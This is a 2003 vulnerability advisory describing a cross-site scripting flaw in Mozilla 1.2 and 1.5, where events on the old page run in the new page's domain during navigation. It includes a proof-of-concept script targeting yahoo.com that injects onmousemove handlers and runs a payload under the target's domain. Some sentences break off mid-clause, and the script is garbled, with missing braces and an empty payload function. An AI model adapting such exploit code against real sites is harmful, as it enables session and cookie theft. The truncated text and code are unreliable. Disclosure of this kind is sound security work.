Product: Mozilla browser
Tested: Mozilla 1.5, Mozilla 1.2
Date: 2003-12-02
Issue: Cross site scripting
Author: Andreas Sandblad, sandblad@acc.umu.se

When linking to a new page it is still possible to interact with the old
page before the new page has been successfully loaded. Any javascript
events fired will be invoked in the context of the new page, making cross
site scripting possible if the different pages belong to different

If you follow a link to another page there will always be some delay until
the new page is shown in the browser. The problem is that before the new page
has been displayed but after the browser has
set the new page as the current URL, it is still possible to interact with
the old page. Any javascript triggered will be operating in the domain of
the new page, regardless of the domain of the old page.

Mozilla has several security checks to prevent cross site scripting,
making actual exploitation a bit tricky. Before Mozilla switches to a new
URL it tries to remove any current running javascript, timers and event
handlers. The problem is that because the old page is still displayed
after the URL switch, it is possible to trigger certain tag events that
Mozilla failed to remove.

Our current document is filled with a lot of tables with height 1
containing onmousemove events. When mouse is initially moved over the
document we link to our target document and wait for Mozilla to switch to
the new URL. If mouse is moved after the switch our injected javascript
will be operating in the context of the new URL. Together with a very
limited amount of user interaction we can achieve a cross site scripting

Put the following code in a script tag and upload it to a remove server.
Make sure you got a cookie stored in the domain of the target. View the
html document containing the script in Mozilla and move the mouse over the
document to activate the exploit.
---------------- BEGIN ---------------------
// Andreas Sandblad
// 2003-11-24
// Mozilla - Cross site scripting

// Target URL (some network delay needed)
var target = "http://www.yahoo.com/";

// Write out a lot of onmousemove events
var block = true;
for (i = 0; i < 1000; i++)
document.write('<table width=100% height=1 border=0><tr>'
+'<td onmousemove="try {block;} catch(e) {'+payload+';payload();}">'
+'<spacer type=block height=1></</td></tr></table>');

// Called first time mouse is moved over document
function trigger() {
document.onmousemove = null;
location = target;
document.onmousemove = trigger;

// If block not definied then call payload
function payload() {
try {
} catch(e) {
---------------- END -----------------------

The vulnerability has been fixed in versions 1.6b and 1.7a